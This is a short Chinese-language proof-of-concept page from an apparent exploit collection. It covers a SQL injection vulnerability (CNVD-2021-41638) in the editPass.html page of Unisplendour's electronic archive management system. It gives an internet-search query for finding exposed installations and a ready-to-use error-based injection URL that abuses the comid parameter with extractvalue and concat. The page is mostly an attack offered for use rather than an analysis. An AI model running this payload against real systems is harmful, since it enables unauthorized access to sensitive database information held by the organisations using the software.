Awesome-POC/Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md
2024-11-06 14:10:36 +08:00

31 lines
653 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638
## 漏洞描述
紫光软件系统有限公司以下简称“紫光软件”是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
## 漏洞影响
```
紫光电子档案管理系统
```
## 网络测绘
```
app="紫光档案管理系统"
```
## 漏洞复现
登录页面
![image-20220525145742607](images/202205251457947.png)
验证POC
```
/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
```
![](images/202205251458637.png)